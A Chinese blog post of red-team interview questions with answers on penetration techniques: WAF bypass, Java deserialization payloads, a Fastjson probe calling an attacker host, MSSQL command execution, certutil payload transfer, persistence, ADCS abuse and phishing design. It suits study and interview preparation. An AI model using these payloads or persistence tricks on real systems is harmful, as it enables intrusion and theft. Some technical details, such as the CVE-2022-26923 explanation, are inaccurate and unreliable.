当前位置: 首页 > news >正文

2025年渗透测试面试题总结-某360-企业蓝军面试复盘 (题目+回答)

 网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

360-企业蓝军

一、Shiro绕WAF实战方案

二、WebLogic遭遇WAF拦截后的渗透路径

三、JBoss/WebLogic反序列化漏洞原理

四、Fastjson漏洞检测与绕过

五、PHP文件下载漏洞深入利用

六、PHP disable_function绕过原理

七、云主机无内网的深度利用

八、Redis主从复制攻击详解

九、BECT利用链使用条件与原理

十、内网域渗透:域外机器定位域控

十一、攻击17010漏洞后无法抓取密码的解决方案

十一、JBoss反序列化漏洞原理

十二、MSSQL绕过360拦截xp_cmdshell

十三、MSSQL文件上传与存储过程权限

十四、内网文件EXE落地与无网场景利用

十五、NTLM Relay+ADCS漏洞利用条件与原理

十六、CVE-2022-26923(ADCS权限提升)

十七、Vcenter权限获取与DB文件解密

十八、锁屏机器利用与权限维持

十九、MSSQL非xp_cmdshell命令执行方式

二十、域管理员查询失败原因与解决

二十一、查询域管理员的本质与原理

二十二、免杀技术:分离与单体区别

二十三、打点常用漏洞简述

二十四、内网横向扩展策略

二十五、钓鱼攻击全流程设计

二十六、钓鱼上线主机的后续利用

360-企业蓝军

shiro绕waf
weblogic如果在打站的时候,一旦遇到了waf,第一个payload发过去,直接被拦截了,ip也被ban了,如何进行下一步操作
jboss反序列化原理
weblogic反序列化原理,随便说一个漏洞,然后说触发原理
fastjson怎么判断是不是有漏洞,原理是什么
fastjson判断漏洞回显是怎么判断的,是用dns做回显还是其他协议做的,为什么
fastjson高版本,无回显的情况,如何进行绕过,为什么可以这样绕过
php代码审计如果审计到了一个文件下载漏洞,如何深入的去利用?
php里面的disable_function如何去进行绕过,为什么可以绕过,原理是什么
假如说,在攻防的时候,控下来一台机器,但是只是一台云主机,没有连接内网,然后也没有云内网,请问怎么深入的对这太云主机进行利用?
redis怎么去做攻击,主从复制利用条件,为什么主从复制可以拿到shell,原理是什么,主从复制会影响业务吗,主从复制的原理是什么?
bect利用链使用条件,原理,代码跟过底层没有,怎么调用的?
假如我攻击了一台17010的机器,然后机器被打重启了,然后重启成功后,机器又打成功了,但是无法抓到密码,为什么无法抓到,这种情况怎么解决这个问题?
内网我现在在域外有一台工作组机器的权限,但是没有域用户,横向也不能通过漏洞打到一台与域用户的权限,但是我知道一定有域,请问这种情况怎么进入到域中找到域控?
jboss反序列化漏洞原理
内网拿到一台mssql机器的权限,但是主机上有360,一旦开了xpcmdshell就被拦截了,执行命令的权限都没有,这种情况怎么进行绕过?
什么是mssql上传文件,需要开启哪个存储过程的权限?
内网文件exe落地怎么去做,用什么命令去执行落地,如果目标主机不出网怎么办?
内网域渗透中,利用ntlm relay配合adcs这个漏洞的情况,需要什么利用条件,responder这台主机开在哪台机器上,为什么,同时为什么adcs这个漏洞能获取域管理员权限,原理是什么?
内网域渗透中,最新出的CVE-2022-26923 ADCE权限提升漏洞需要什么利用条件,原理是什么,相比原理的ESC8漏洞有什么利用优势?
内网渗透中,如何拿到一套vencter的权限,如果进一步深入利用?db文件如何解密?原理是什么?
venter机器拿到原理员密码了,也登录进去了,但是存在一个问题,就是内部有些机器锁屏了,需要输入密码,这个时候怎么去利用?
内网权限维持的时候,360开启了晶核模式,怎么去尝试权限维持?计划任务被拦截了怎么办?
mssql除了xpcmdshell,还有什么执行系统命令的方式?需要什么权限才可以执行?
如果net group "Domain Admins"/domain这条命令,查询域内管理员,没法查到,那么可能出现了什么问题?怎么解决?
查询域内管理员的这条命令的本质究竟是去哪里查,为什么输如了之后就可以查到?
免杀中,分离免杀和单体免杀有啥区别,为什么要分离,本质是什么?
打点常用什么漏洞,请简述
内网横向中,是直接进行拿一台机器的权限直接开扫,还是有别的办法?
钓鱼是用什么来钓?文案思路?如何判断目标单位的机器是哪种协议出网?是只做一套来钓鱼还是做几套来钓鱼?如何提高钓鱼成功率?
钓鱼上线的主机,如何进行利用?背景是只发现了一个域用户,但是也抓不到密码,但是有域。

一、Shiro绕WAF实战方案

  1. 绕过逻辑
    • 密钥动态爆破:使用ShiroAttack2工具爆破历史漏洞密钥(如kPH+bIxk5D2deZiIxcaaaA==),生成合法Cookie绕过特征检测。
    • 流量分片混淆:将Payload拆分为多段,插入冗余参数(如padding=random)或通过HTTP分块传输(Chunked Encoding)干扰WAF解析。
    • 协议级伪装:封装请求为HTTP/2协议,利用头部压缩特性绕过传统正则匹配。
  2. 工具链推荐
    • Ysoserial-2025生成动态Gadget链,避免CommonsBeanutils等常见类名触发拦截。
    • Burp Collaborator实时监控DNS/HTTP回显,验证漏洞有效性。

二、WebLogic遭遇WAF拦截后的渗透路径

  1. IP被封禁的应急处理
    • IP池轮换:使用云函数(如AWS Lambda)动态生成代理IP,绕过单IP限制。
    • 协议降级攻击:将T3协议流量伪装为HTTP/1.1,利用Content-Type: application/octet-stream绕过协议识别。
  2. 分阶段攻击策略
    • 初探阶段:发送无害探测包(如t3 12.2.1\nAS:255\nHL:19\n\n),观察WAF响应规则。
    • 载荷拆分:利用Coherence组件的反序列化链,将恶意对象拆分为多个请求分片传输。

三、JBoss/WebLogic反序列化漏洞原理

  1. JBoss(CVE-2015-7501)
    • 触发点HttpInvoker服务未验证反序列化数据,攻击者发送恶意序列化对象触发RCE。
    • 利用链:基于InvokerTransformer调用Runtime.getRuntime().exec() ,构造链如下:
      javaObjectInputStream.readObject() → InvokerTransformer.transform() → Runtime.exec("calc.exe") 
  2. WebLogic(CVE-2017-10271)
    • 漏洞点wls-wsat组件的XMLDecoder解析漏洞,构造恶意XML触发代码执行。
    • Payload示例
      xml<java version="1.8" class="java.beans.XMLDecoder"> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="1"> <void index="0"><string>calc.exe</string></void> </array> <void method="start"/> </object> </java>

四、Fastjson漏洞检测与绕过

  1. 漏洞判断原理
    • DNS回显法:发送Payload {"@type":"java.net.InetAddress","val":"dnslog.attacker.com"} ,观察DNS解析记录。
    • 报错探测:利用autoType开关触发异常(如关闭时抛出autoType is not support)。
  2. 高版本无回显绕过
    • 内存马注入:结合JNDI漏洞加载内存WebShell(如Tomcat的Filter型内存马)。
    • 延时盲注:通过Thread.sleep() 或DNS递归查询实现时间盲注。
    • 二次反序列化:触发其他组件漏洞(如Log4j的JNDI Lookup)。

五、PHP文件下载漏洞深入利用

  1. 基础利用
    • 敏感文件读取download.php?file=../../.env 获取数据库凭据。
    • 源码泄露:结合PHP伪协议(php://filter/convert.base64-encode/resource=index.php )读取源码。
  2. 组合漏洞利用
    • 文件包含+下载:通过LFI漏洞包含下载的WebShell文件(如/proc/self/fd/12)。
    • 反序列化触发:下载phar文件触发反序列化漏洞(需phar.readonly=Off )。

六、PHP disable_function绕过原理

  1. 绕过技术
    • LD_PRELOAD劫持:利用mail()函数启动子进程,通过putenv()加载恶意so文件执行命令。
    • FFI扩展利用:直接调用C函数(需PHP≥7.4),如FFI::cdef("int system(char *command);")->system("id");
    • ImageMagick漏洞:利用CVE-2016-3718的ephemeral协议执行命令。
  2. 防御对抗
    • 禁用危险函数(如dl())和扩展(如FFI)。
    • 使用open_basedir限制文件访问范围。

七、云主机无内网的深度利用

  1. 攻击路径
    • 元数据服务利用:访问云厂商元数据接口(如AWS的169.254.169.254)获取临时凭证,横向访问S3/ECS资源。
    • 容器逃逸:利用Cgroup漏洞(CVE-2022-0492)或挂载宿主机目录逃逸到物理机。
    • 凭证泄露挖掘:扫描历史命令、环境变量(env)、配置文件(~/.aws/credentials)。
  2. 工具推荐
    • CloudMapper自动分析云环境配置。
    • Pacu 3.0针对AWS的全场景攻击框架。

八、Redis主从复制攻击详解

  1. 利用条件
    • Redis未授权访问且版本<6.0(默认未启用模块签名验证)。
    • 主从复制功能开放(replicaof命令可用)。
  2. 攻击流程
    • 设置恶意主节点:在攻击机启动Redis服务,生成恶意.so模块。
    • 诱导从节点同步:通过SLAVEOF命令使目标Redis同步攻击机数据。
    • 加载模块执行命令:利用MODULE LOAD加载恶意模块,调用system.exec 执行命令。
  3. 业务影响:主从复制可能导致数据覆盖,需谨慎操作。

九、BECT利用链使用条件与原理

  1. 利用链条件
    • 目标依赖库包含BeanutilsCommons-Collections(版本≤3.2.1)。
    • 存在触发反序列化的入口(如HTTP参数、RMI接口)。
  2. 触发原理
    • 通过AnnotationInvocationHandler触发TransformeredMap链,调用InvokerTransformer执行命令。
    • 代码底层调用路径:
      javaObjectInputStream.readObject() → AnnotationInvocationHandler.readObject() → TransformeredMap.checkSetValue() → InvokerTransformer.transform() 
  3. 调试技巧:使用JD-GUI反编译分析Gadget链,结合IDEA动态调试触发点。

十、内网域渗透:域外机器定位域控

  1. 攻击路径
    • NTLM Relay攻击
      • 利用Responder捕获SMB认证请求,中继至LDAP服务添加域管理员用户。
      • 部署位置:需与域控网络互通(如同一VLAN)。
    • ADCS漏洞利用(ESC8)
      • 通过HTTP证书申请漏洞获取高权限证书,使用Certipy申请域管理员票据。
  2. 定位域控方法
    • DNS查询nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
    • NetBIOS扫描nbtscan -r 192.168.1.0/24查找DOMAIN<1B>记录。

十一、攻击17010漏洞后无法抓取密码的解决方案

  1. 原因分析
    • 目标系统安装补丁(如KB4551853)修复了永恒之蓝的SMBv1协议漏洞,导致明文密码无法抓取。
    • 流量被加密(如SMB Signing启用)或防御工具(如EDR)拦截。
  2. 绕过方案
    • 协议降级:强制使用SMBv1协议(nmap --script smb-protocols)。
    • 哈希传递攻击:使用secretsdump.py 提取NTLM Hash,通过psexec.py -hashes横向移动。
    • 流量混淆:通过DNS隧道或ICMP隐蔽信道传输数据。

十一、JBoss反序列化漏洞原理

漏洞背景:JBoss AS 6.x及更早版本的HttpInvoker服务未对反序列化数据过滤,导致远程代码执行(如CVE-2015-7501)。
触发原理

  1. 入口点/invoker/readonly接口接收序列化对象。
  2. 利用链:基于Apache Commons Collections的InvokerTransformer链,触发任意类方法调用。
    javaObjectInputStream.readObject() → InvokerTransformer.transform() → Runtime.getRuntime().exec("calc.exe") 
  3. 防御绕过:新版WildFly禁用HttpInvoker,企业可通过升级或启用反序列化过滤器(如SerialKiller)防御。

十二、MSSQL绕过360拦截xp_cmdshell

绕过方案

  1. CLR集成
    • 启用CLR:sp_configure 'clr enabled', 1; RECONFIGURE;
    • 加载恶意DLL:CREATE ASSEMBLY ExecCmd FROM '\\attacker\share\evil.dll' ,通过存储过程调用。
    • 优势:无需xp_cmdshell,且360对CLR检测较弱。
  2. Agent Jobs调度
    • 创建作业:sp_add_job @job_name='UpdateTask' → 添加命令步骤exec master..xp_cmdshell 'whoami'
    • 权限需求SQLAgentUserRole角色权限。
  3. sp_OACreate执行
    • 启用OLE自动化:sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
    • 调用wscript.shellDECLARE @o INT; EXEC sp_OACreate 'wscript.shell', @o OUT; EXEC sp_OAMethod @o, 'run', NULL, 'cmd /c whoami';

十三、MSSQL文件上传与存储过程权限

  1. 上传文件方法
    • BCP命令:导出表数据到文件,需ADMINISTER BULK OPERATIONS权限。
    • OLE自动化:通过sp_OACreate调用ADODB.Stream写入文件。
    • CLR存储过程:自定义DLL实现文件操作。
  2. 关键权限
    • xp_cmdshellsysadmin角色。
    • sp_OACreate需启用Ole Automation Procedures并授予EXECUTE权限。

十四、内网文件EXE落地与无网场景利用

落地方案

  1. 编码传输
    • Certutilcertutil -encode payload.exe payload.b64,目标端解码certutil -decode payload.b64 payload.exe
    • Debug.exe :将EXE转为十六进制脚本,通过调试器还原。
  2. 无网执行
    • 计划任务schtasks /create /tn "Update" /tr C:\payload.exe /sc once /st 00:00(需管理员权限)。
    • 服务创建sc create MyService binPath= C:\payload.exe start= auto
  3. 横向传输:通过SMB共享(copy \\192.168.1.2\share\payload.exe C:\)或Web目录(如IIS)上传。

十五、NTLM Relay+ADCS漏洞利用条件与原理

利用条件

  1. ADCS配置:启用HTTP证书注册接口(默认启用)。
  2. 中继目标:域内主机存在未修复的NTLM签名漏洞(如SMB Signing未强制)。
  3. Responder部署位置:需位于与目标同一广播域(如同一VLAN),以捕获Net-NTLMv2哈希。

提权原理

  • ADCS漏洞(ESC8):通过中继的Net-NTLMv2哈希申请证书,证书模板允许域用户申请高权限证书(如域管理员模板)。
  • Certipy工具链:自动化生成证书→申请TGT→获取域控权限。

十六、CVE-2022-26923(ADCS权限提升)

利用条件

  1. 域用户权限。
  2. 证书模板允许用户指定SAN(Subject Alternative Name),且管理员未限制SAN字段。

原理

  • 攻击者伪造SAN为域管理员(如Administrator@domain),申请证书后通过S4U2Self获取域管理员TGT。
  • 相比ESC8优势:无需中继,直接利用证书模板漏洞,成功率更高且隐蔽性强。

十七、Vcenter权限获取与DB文件解密

攻击路径

  1. 漏洞利用:CVE-2021-21972(SSRF+文件上传)上传WebShell,获取vCenter Server权限。
  2. DB文件解密
    • 文件位置/storage/db/vpostgres/data中的encrypted.db
    • 解密工具:使用vCenter-decrypt.py 提取硬编码密钥解密。
    • 原理:vCenter 7.x使用AES-256加密配置文件,密钥存储在/etc/vmware/vpx/vcdb.properties

深入利用

  • 通过vCenter管理界面部署恶意虚拟机,利用VM Escape攻击宿主机。

十八、锁屏机器利用与权限维持

锁屏绕过

  1. 内存提取密码:使用Mimikatz的sekurlsa::logonpasswords抓取已登录用户的明文密码或哈希。
  2. 物理攻击:替换粘滞键程序(C:\Windows\System32\sethc.exe )为cmd.exe ,通过登录界面调用。

360晶核模式绕过

  1. WMI事件订阅:通过__EventFilterCommandLineEventConsumer执行持久化命令。
  2. 注册表隐蔽键
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce添加启动项。
    • 防御对抗:使用非常规键名(如UpdateTask)绕过关键字检测。

十九、MSSQL非xp_cmdshell命令执行方式

  1. sp_OACreate
    • 权限sysadmindb_owner+启用OLE自动化。
    • 命令示例EXEC sp_OACreate 'wscript.shell', @o OUT; EXEC sp_OAMethod @o, 'run', NULL, 'cmd /c whoami';
  2. CLR集成:需UNSAFE ASSEMBLY权限,加载C#编写的恶意DLL。
  3. Agent Jobs:需SQLAgentUserRole权限,创建任务执行命令。

二十、域管理员查询失败原因与解决

可能原因

  1. 当前用户无域管理员组查询权限。
  2. 域控防火墙阻断RPC/SAMR协议通信。
  3. 域控DNS解析异常。

解决方案

  • PowerShell查询Get-ADGroupMember "Domain Admins" -Server DomainController
  • LDAP直接查询ldapsearch -H ldap://dc.domain.com -b "CN=Domain Admins,CN=Users,DC=domain,DC=com"

二十一、查询域管理员的本质与原理

底层机制

  • net group "Domain Admins" /domain通过SAMR协议向域控发起查询,需域用户权限。
  • 协议路径
    Client → DC(TCP 445/SMB) → SAMR API → 返回组成员列表  
    
  • 依赖条件:域控的Netlogon服务正常运行且客户端能解析域控IP。

二十二、免杀技术:分离与单体区别

类型实现方式优势本质
分离免杀Shellcode远程加载(HTTPS/DNS)静态检测难度高动态加载规避特征匹配
单体免杀修改PE头/加密代码段无需网络通信混淆代码逻辑绕过静态分析

分离必要性:降低单文件熵值,规避沙箱检测,适应网络隔离环境。


二十三、打点常用漏洞简述

  1. Web漏洞:SQL注入、Fastjson反序列化、Log4j JNDI注入。
  2. 服务漏洞:SMBGhost(CVE-2020-0796)、Exchange SSRF(CVE-2024-21410)。
  3. 框架漏洞:Spring Cloud Gateway RCE(CVE-2022-22947)。

二十四、内网横向扩展策略

非扫描式渗透

  1. 凭证接力:使用CrackMapExec传递哈希(如cme smb 192.168.1.0/24 -u user -H ntlm_hash)。
  2. 漏洞精准打击:针对高价值主机(如域控)利用已知漏洞(如Zerologon)。
  3. 协议滥用:通过LLMNR/NBT-NS投毒诱导凭证泄露。

二十五、钓鱼攻击全流程设计

攻击链设计

  1. 载体选择
    • 邮件附件:LNK文件伪装为PDF图标。
    • 恶意链接:短域名跳转至钓鱼页面(如虚假O365登录页)。
  2. 协议探测
    • 多协议Payload:发送HTTP/DNS/ICMP探测包,观察出网行为。
  3. 文案优化
    • 行业定制:针对金融行业伪造“审计通知”,针对IT部门伪装“漏洞修复指南”。
  4. 成功率提升
    • 多模板测试:A/B测试不同文案,筛选高点击率模板。
    • 时间选择:工作日上午9-11点发送,提高打开率。

二十六、钓鱼上线主机的后续利用

域内横向路径

  1. Kerberoasting:请求高权限SPN票据(如setspn -T domain -Q */*),离线破解哈希。
  2. NTLM Relay攻击:诱导域控发起SMB认证,中继至LDAP服务添加域管理员。
  3. 委派漏洞利用:检查msDS-AllowedToDelegateTo,利用约束委派获取域控权限。

相关文章:

2025年渗透测试面试题总结-某360-企业蓝军面试复盘 (题目+回答)

网络安全领域各种资源&#xff0c;学习文档&#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具&#xff0c;欢迎关注。 目录 360-企业蓝军 一、Shiro绕WAF实战方案 二、WebLogic遭遇WAF拦截后的渗透路径 三、JBoss/WebLogic反序…...

Atlas 800I A2 双机直连部署DeepSeek-R1-w8a8

一、环境信息 1.1、硬件信息 Atlas 800I A2 * 2 1.2、环境信息 操作系统&#xff1a;openEuler 22.03 LTS NPU驱动&#xff1a;Ascend-hdk-910b-npu-driver 24.1.0 linux-aarch64.run NPU固件&#xff1a;Ascend-hdk-910b-npu-firware 7.5.0.3.220.run MindIE镜像&#xff…...

OpenHarmony 入门——ArkUI 跨页面数据同步和页面级UI状态存储LocalStorage小结(二)

文章大纲 引言一、在代码逻辑使用LocalStorage二、从UI内部使用LocalStorage三、LocalStorageProp和LocalStorage单向同步四、LocalStorageLink和LocalStorage双向同步五、兄弟组件之间同步状态变量七、将LocalStorage实例从UIAbility共享到一个或多个视图 引言 前面一篇文章主…...

自我革命!优利德全面进入智能示波器时代

AI重构电子测试新范式 春节期间&#xff0c;DeepSeek&#xff08;深度求索&#xff09;火遍全网。作为国内首个全面对标GPT-4技术架构的AI大模型&#xff0c;DeepSeek凭借其自主研发的通用大语言模型体系&#xff0c;涵盖了从7B到超千亿参数的完整模型矩阵&#xff0c;在数学推…...

Vue3 实战:基于 mxGraph 与 WebSocket 的动态流程图构建

本文将详细介绍如何在 Vue3 项目中集成 mxGraph 可视化库&#xff0c;并通过 WebSocket 实现画布元素的实时更新。适合有 Vue 基础的前端开发者学习参考。 一、技术栈准备 Vue3&#xff1a;采用 Composition API 开发mxGraph&#xff1a;JavaScript 流程图库&#xff08;版本 …...

Python-金融相关代码讲解

文章目录 概要整体架构流程1.代码部分2.逐个讲解1&#xff09;# -*- coding: utf-8 -*-2&#xff09;基本库引入3&#xff09;函数模块4&#xff09;主程序 小结1. 问题拆解思维2. 文件处理三件套3. 字典的妙用&#xff1a;4. 上下文管理器&#xff08;with open...&#xff09…...

深度解读DeepSeek:开源周(Open Source Week)技术解读

深度解读DeepSeek&#xff1a;开源周&#xff08;Open Source Week&#xff09;技术解读 深度解读DeepSeek&#xff1a;源码解读 DeepSeek-V3 深度解读DeepSeek&#xff1a;技术原理 深度解读DeepSeek&#xff1a;发展历程 文章目录 一、开源内容概览Day1&#xff1a;FlashMLAD…...

【算法】十大排序算法(含时间复杂度、核心思想)

以下是 **十大经典排序算法** 的时间复杂度、空间复杂度及稳定性总结&#xff0c;适用于面试快速回顾&#xff1a;排序算法对比表 排序算法最佳时间复杂度平均时间复杂度最差时间复杂度空间复杂度稳定性核心思想冒泡排序O(n)O(n)O(n)O(1)稳定相邻元素交换&#xff0c;大数沉底…...

TCP传输---计算机网络

TCP结构 源端口和目标端口&#xff1a;标识通信的应用程序。序列号&#xff1a;标记发送的数据段的顺序序号。确认号 ( ACK)&#xff1a;确认接收到的数据序号。标志位&#xff1a;控制连接状态&#xff0c;包括 SYN&#xff08;同步&#xff09;、ACK&#xff08;确认&#xf…...

创建vue2项目

1、前往 Node.js 官网下载并安装 Node.js&#xff0c;安装完成后&#xff0c;npm 会随之安装。确认 Node.js 和 npm 是否成功安装&#xff0c;可以在命令行中运行以下命令检查版本&#xff1a; node -v npm -v 运行结果&#xff1a;&#xff08;如下&#xff0c;表示node和n…...

从投机到可持续发展:ETHDenver 2025 的关键启示!

ETHDenver 2025 重点讨论了 Web3 向可持续发展转型&#xff0c;特别强调了人才培养、去中心化治理和激励机制的紧密结合。Polkadot 一直以来的长期观点也进一步支持了行业从投机转向长期、社区驱动增长的趋势。随着 ETHDenver 2025 会议的的落幕&#xff0c;Polkadot 生态中的贡…...

WPS宏开发手册——使用、工程、模块介绍

目录 系列文章前言1、开始1.1、宏编辑器使用步骤1.2、工程1.3、工程 系列文章 使用、工程、模块介绍 JSA语法 第三篇练习练习题&#xff0c;持续更新中… 前言 如果你是开发人员&#xff0c;那么wps宏开发对你来说手拿把切。反之还挺吃力&#xff0c;需要嘻嘻&#xf…...

操作系统为ubantu的服务器上部署nginx软件基础步骤总结

今天在这里&#xff0c;我们总结一下ubantu的服务器上部署nginx软件&#xff0c;请按照以下步骤进行安装&#xff1a; 1、更新包列表&#xff1a; 首先更新你系统中的可用软件包列表&#xff0c;以确保你可以安装最新版本。 sudo apt update2、 Ubuntu上更新已安装软件包&…...

批量给 PPT 文档添加或删除保护,批量设置打开密码和只读密码

为了保护保护档的安全&#xff0c;我们经常会给 PPT 文档添加打开密码或者只读密码保护。有些场景下&#xff0c;我们也可能会碰到需要删除 PPT 文档的打开密码或者只读密码的需求。今天就给大家介绍一种方法可以一次性批量给多个 PPT 文档添加打开密码或者只读密码保护&#x…...

Elasticsearch 中的数据分片问题

Elasticsearch 分片机制 Elasticsearch 在存储数据时采用 分片&#xff08;Shard&#xff09;机制&#xff0c;以提高性能和可扩展性。它索引中的数据被划分成多个 主分片&#xff08;Primary Shard&#xff09; 和 副本分片&#xff08;Replica Shard&#xff09;&#xff0c…...

如何在IPhone 16Pro上运行python文件?

在 iPhone 16 Pro 上运行 Python 文件需要借助第三方工具或远程服务&#xff0c;以下是具体实现方法和步骤&#xff1a; 一、本地运行方案&#xff08;无需越狱&#xff09; 使用 Python 编程类 App 以下应用可在 App Store 下载&#xff0c;支持直接在 iPhone 上编写并运行 …...

Xinference安装、使用详细笔记

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 Xinference安装、使用详细笔记 支持推理引擎安装Xinference启动Xinference关于模型的推理引擎运行 qwen2.5-instruct管理模型官方详细文档&#xff1a;具体使用&#xff1a;对…...

NAT 模式

使用LVS的 NAT 模式实现 3 台RS的轮询访问。IP地址和主机自己规划。 1.节点规划 主机角色系统网络IPclientclientredhat 9.5仅主机192.168.180.100/24lvslvsredhat 9.5仅主机 NAT192.168.180.200/24 VIP 192.168.72.8/24 DIPnginxrs1redhat 9.5NAT192.168.226.7/24nginxrs2r…...

【中间件】Rabbit离线部署操作

准备安装包&#xff1a; 1.rabbitmq-server-4.0.7-1.el8.noarch.rpm 2.erlang-26.2.5.4-1.el9.x86_64.rpm 3.socat-1.7.4.1-6.el9.x86_64.rpm 操作步骤&#xff1a; 1.上传将RabbitMQ文件夹上传至服务器的home中 2.先安装erlang服务&#xff0c;顺序执行以下命令 设置服务的S…...

thinkphp漏洞再现

Thinkphp5x远程命令执行及getshell 1、开环境 2、使用工具攻击 开启工具 输入地址&#xff0c;点击漏洞检测 存在漏洞之后&#xff0c;选择漏洞&#xff0c;执行命令 3、也可以执行远程命令 执行命令 ?sindex/think\app/invokefunction&functioncall_user_func_array&…...

a-date-picker 格式化日期格式 YYYY-MM-DD HH:mm:ss

<template><a-range-pickerv-model:value"dateRange":show-time"{ format: HH:mm:ss, // 时间部分格式defaultValue: [moment(00:00:00, HH:mm:ss), moment(23:59:59, HH:mm:ss)] // 默认时间范围}"format"YYYY-MM-DD HH:mm:ss" // 整体…...

【前端】在<el-form>里循环插入list内容

这里的list为日志list【logList】 <el-row v-if"logList && logList.length > 0" style"display: flex; flex-direction: column; align-items: center;"><el-rowv-for"(log, index) in logList" :key"index" s…...

Spring Boot 一个接口实现任意表的 Excel 导入导出

Java的web开发需要excel的导入导出工具&#xff0c;所以需要一定的工具类实现&#xff0c;如果是使用easypoi、Hutool导入导出excel&#xff0c;会非常的损耗内存&#xff0c;因此可以尝试使用easyexcel解决大数据量的数据的导入导出&#xff0c;且可以通过Java8的函数式编程解…...

华为交换相关

端口模式 &#xff08;1&#xff09;access&#xff1a;只能属于单个VLAN&#xff0c;一般用于连接计算机端口 &#xff08;2&#xff09;trunk&#xff1a;端口允许多个VLAN通过&#xff0c;可以接收和发送多个VLAN报文&#xff0c;默认情况下只有管理VLAN不携带标签信息 &…...

「宇树科技」13家核心零部件供应商梳理!

2025年2月6日&#xff0c;摩根士丹利&#xff08;Morgan Stanley&#xff09;发布最新人形机器人研报&#xff1a;Humanoid 100: Mapping the Humanoid Robot Value Chain&#xff08;人形机器人100&#xff1a;全球人形机器人产业链梳理&#xff09;。 2025年2月20日&#xf…...

Kafka Snappy 压缩异常分析与解决方案

1. 问题描述 在使用 Kafka 进行消息发送时&#xff0c;遇到了以下异常&#xff1a; org.apache.kafka.common.KafkaException: java.lang.UnsatisfiedLinkError: /tmp/snappy-1.1.7-ee0a2284-1d05-4116-9ddc-a0d5d4b3f8cd-libsnappyjava.so: Error loading shared library ld…...

Agent系列——Manus调研

一、Manus核心技术解析&#xff08;代码实现原理&#xff09; 1. 多智能体协同架构 class PlanningAgent: # 任务规划代理def decompose_task(self, task):return ["unzip_files", "extract_info", "match_skills"]class ExecutionAgent: # …...

CS实现票据样式效果

效果图 代码 <template> <div class"outer"><div class"outer-container"></div></div> </template> <script langts> import { reactive, toRefs, onBeforeMount, onMounted } from vue import { useRouter, …...

Maven 简介及其核心概念

Maven 是 Apache 软件基金会组织维护的一款自动化构建工具,专注服务于 Java 平台的项目构建和 依赖管理。 官网: Introduction – Maven 下载地址: Download Apache Maven – Maven 1 Introduction Maven, a Yiddish word meaning accumulator of knowledge, began as an …...

阿里开源的免费数据集成工具——DataX

企业里真实的数据流转是什么样子的呢&#xff1f; 左侧描述了一个企业真实的样子&#xff0c;我们总是需要把数据从一个地方搬到另一个地方&#xff0c;最后就是搬来搬去搬成了一张张解不开的网。 右侧则表达了使用DataX为中心实现数据的同步。 什么是DataX DataX是一个异构…...

医学图像分割数据集肺分割数据labelme格式6299张2类别

数据集格式&#xff1a;labelme格式(不包含mask文件&#xff0c;仅仅包含jpg图片和对应的json文件) 图像分辨率&#xff1a;1024x1024 图片数量(jpg文件个数)&#xff1a;6299 标注数量(json文件个数)&#xff1a;6299 标注类别数&#xff1a;2 标注类别名称:["leftl…...

Spring IoC的设计与实现

IoC,Inversion of Control 控制反转&#xff0c;将原本由应用程序负责对象创建的工作&#xff0c;交给IOC容器来完成。容器通过依赖注入&#xff08;DI&#xff0c;Dependency Injection&#xff09;来实现。 作用&#xff1a;降低类对象之间的耦合度&#xff0c;减少代码量。…...

微信小程序开发:页面结构与样式设计

微信小程序页面结构与样式设计研究 摘要 微信小程序作为移动互联网的重要应用形式&#xff0c;其页面结构与样式设计对于用户体验和功能实现具有关键作用。本文深入探讨微信小程序的页面结构与样式设计&#xff0c;包括WXML语法与页面结构搭建、WXSS样式编写与页面美化提升以…...

Linux paste命令

目录 一. 简介二. 基本语法三. 小案例 一. 简介 paste 命令用于合并多个文件的行&#xff0c;按列方式输出&#xff0c;默认以制表符&#xff08;Tab&#xff09;分隔。 ⏹基本语法 paste [选项] 文件1 文件2 ...二. 基本语法 <()的方式模拟文件流paste命令将2个文件流粘…...

关于Object.assign

Object.assign 基本用法 Object.assign() 方法用于将所有可枚举属性的值从一个或者多个源对象source复制到目标对象。它将返回目标对象target const target { a: 1, b: 2 } const source { b: 4, c: 5 }const returnedTarget Object.assign(target, source)target // { a…...

新能源汽车充换站如何实现光储充一体化管理?

长三角某换电站光伏板晒到发烫&#xff0c;却因电网限电被迫切机&#xff1b;北京五环充电站每月多缴6万超容费&#xff1b;深圳物流车充电高峰排队3小时...当95%的充换站深陷“用不起绿电、扛不住扩容、算不清碳账”困局&#xff0c;安科瑞用一组真实数据撕开行业潜规则&#…...

Flink 流处理框架的核心特性

文章目录 事件时间支持Flink状态编程一、状态的类型1. 托管状态&#xff08;Managed State&#xff09;2. 原始状态&#xff08;Raw State&#xff09; 二、状态的管理和容错 Flink端到端的一致性1、检查点机制2、幂等3、事务 水位线窗口操作1、窗口类型2、窗口操作的时间语义 …...

蓝桥杯之AT24C02的页写页读

一、原理&#xff1a; 1、页写&#xff1a;一次性向AT24C02里的多个数据存储单元地址写入多个数据 &#xff08;1&#xff09;在AT24C02的页写模式下&#xff0c;每次写入数据后&#xff0c;存储单元地址会自动加1。 &#xff08;2&#xff09;一页有8个数据存储单元&#xff…...

计算机二级web易错点(7)-选择题

在 JavaScript 中&#xff0c;substr() 方法用于从字符串中提取子字符串。它接受两个参数&#xff0c;第一个参数表示开始提取的位置&#xff08;索引从 0 开始&#xff09;&#xff0c;第二个参数表示要提取的字符数量。 在代码 var str"abcdefgh"; alert(str.subs…...

WordPress子主题插件 Child Theme Configurator

一、插件介绍 Child Theme Configurator 是一款强大的 WordPress 插件,专为创建和管理子主题(Child Theme)而设计。使用子主题可以安全地自定义 WordPress 站点,而不会影响原主题(Parent Theme),同时确保主题更新时不会丢失修改。 该插件适用于初学者和高级开发者,提…...

[网鼎杯 2020 白虎组]PicDown1 [反弹shell] [敏感文件路径] [文件描述符]

常见读取路径 /etc/passwd一些用户和权限还有一些乱七八糟的 /proc/self/cmdline包含用于开始当前进程的命令 /proc/self/cwd/app.py当前工作目录的app.py /proc/self/environ包含了可用进程的环境变量 /proc/pid/exe 包含了正在进程中运行的程序链接&#xff1b; /proc/pid…...

基于Spring Boot的乡村养老服务管理系统的设计与实现(LW+源码+讲解)

